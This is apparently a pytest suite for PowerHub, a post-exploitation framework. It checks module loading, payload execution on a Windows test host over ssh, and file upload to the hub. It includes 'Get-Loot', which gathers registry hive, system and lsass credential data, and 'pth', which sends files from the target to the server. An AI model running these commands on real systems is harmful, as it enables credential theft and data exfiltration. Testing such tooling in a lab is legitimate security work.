def test_load_hubmodule(backend):
    """Loading one hub module by name runs its function and reports its metadata."""
    output = execute_cmd(backend("lhm psmod53|fl;Invoke-Testfunc53"))
    # The module's test function must have run and the module name must be echoed.
    for needle in ("Test53", "psmod53"):
        assert needle in output
    # `fl` (Format-List) prints one "Key : Value" line per property, CRLF-terminated.
    expected_lines = (
        "Name *: .*psmod53.ps1\r\n",
        "Type *: ps1\r\n",
        "N *: 72\r\n",
        "Loaded *: True\r\n",
    )
    for pattern in expected_lines:
        assert re.search(pattern, output)
def test_load_hubmodule_range(backend):
    """Loading a range expression ("72-74,77") makes every covered module callable."""
    command = (
        '$p="72-74,77";lhm $p;Invoke-Testfunc53;'
        "Invoke-Testfunc99;Invoke-Testfunc47;Invoke-Testfunc72;"
    )
    output = execute_cmd(backend(command))
    # NOTE: how the range indices map onto modules 53/99/47/72 is not obvious
    # from this file; the original author left the same remark.
    for marker in ("Test53", "Test99", "Test47", "Test72"):
        assert marker in output
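def copy_and_execute(filename, payload, interpreter=""):
    """Copy *payload* to the ``win10`` host over scp and run it there via ssh.

    Args:
        filename: name intended for the remote copy.  NOTE(review): the body
            as shown does not reference it when building the remote path;
            confirm against the caller.
        payload: file contents; a ``str`` is written in text mode, anything
            else in binary mode.
        interpreter: optional program placed before the remote path on the
            ssh command line (empty runs the file directly).

    Returns:
        The output of ``execute_cmd`` for the remote execution step.

    Raises:
        subprocess.CalledProcessError: propagated from the scp/ssh steps when
            they fail.  A failing remote ``del`` (no stale copy) is tolerated.
    """
    import os
    import subprocess
    import tempfile

    mode = "w" if isinstance(payload, str) else "wb"
    # delete=False so the file survives close() long enough for scp; it is
    # removed explicitly below, which the original version never did, leaving
    # a copy of every payload behind in the local temp directory.
    tmpf = tempfile.NamedTemporaryFile(mode, delete=False)
    try:
        tmpf.write(payload)
        tmpf.close()
        # The command lines are assembled by string interpolation; the values
        # (tempfile name, the interpreter argument) come from this harness,
        # not from external input.
        try:
            execute_cmd(f"ssh win10 del C:/Windows/Temp/(unknown)")
        except subprocess.CalledProcessError:
            # Expected when there is no stale copy on the remote host.
            pass
        execute_cmd(f"scp {tmpf.name} win10:C:/Windows/Temp/(unknown)")
        out = execute_cmd(f"ssh win10 {interpreter} C:/Windows/Temp/(unknown)")
    finally:
        tmpf.close()  # idempotent; covers the path where write() raised
        os.unlink(tmpf.name)
    return out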
def test_upload(backend):
    """`pth` uploads both a file and a piped string into UPLOAD_DIR."""
    from powerhub.directories import UPLOAD_DIR

    def assert_no_ps_error(output):
        # "At line:" in the output marks a PowerShell error.
        assert "At line:" not in output

    def read_upload(name):
        with open(os.path.join(UPLOAD_DIR, name), "rb") as fh:
            return fh.read()

    testfile = f"testfile-{random.randrange(16 ** 30):030x}.dat"

    # First upload: a 255-byte file created in %TEMP%, uploaded, then removed.
    script = (
        f'$p=Join-Path $env:TEMP "{testfile}";'
        "[io.file]::WriteAllBytes($p,(1..255));"
        "pth $p;rm $p"
    )
    output = execute_cmd(backend(script))
    time.sleep(1)
    assert_no_ps_error(output)
    assert read_upload(testfile) == bytes(range(1, 256))

    # Second upload: a string piped into pth under the same name; the test
    # expects it to be stored as "<name>.1" next to the first copy.
    output = execute_cmd(backend(f'$p="FooBar123";$p|pth -name {testfile};'))
    time.sleep(1)
    assert_no_ps_error(output)
    assert read_upload(testfile + ".1") == b"FooBar123"
def test_get_loot(backend):
    """`Get-Loot` adds exactly one loot record carrying hive, sysinfo and lsass data."""
    from powerhub import sql

    count_before = len(sql.get_loot())
    output = execute_cmd(backend("Get-Loot"))
    # "At line:" in the output marks a PowerShell error.
    assert "At line:" not in output

    # The record is read back immediately; no polling or retry is done here.
    all_loot = sql.get_loot()
    assert len(all_loot) == count_before + 1
    newest = all_loot[-1]

    expectations = (
        (newest.hive, "Administrator"),
        (newest.hive, "500"),
        (newest.sysinfo, "Microsoft Windows"),
        (newest.sysinfo, "isadmin"),
        (newest.lsass, "session_id"),
    )
    for haystack, needle in expectations:
        assert needle in haystack
def test_list_hubmodules(backend):
    """`lshm` lists every generated test module psmod0 .. psmod(MAX_TEST_MODULE_PS1-1)."""
    output = execute_cmd(backend("lshm"))
    expected_names = [f"psmod{index}" for index in range(MAX_TEST_MODULE_PS1)]
    for name in expected_names:
        assert name in output
def test_start(backend):
    """An empty command produces the banner with the author and the help hint."""
    output = execute_cmd(backend(""))
    for banner_fragment in ("Adrian Vollmer", "Run 'Help-PowerHub' for help"):
        assert banner_fragment in output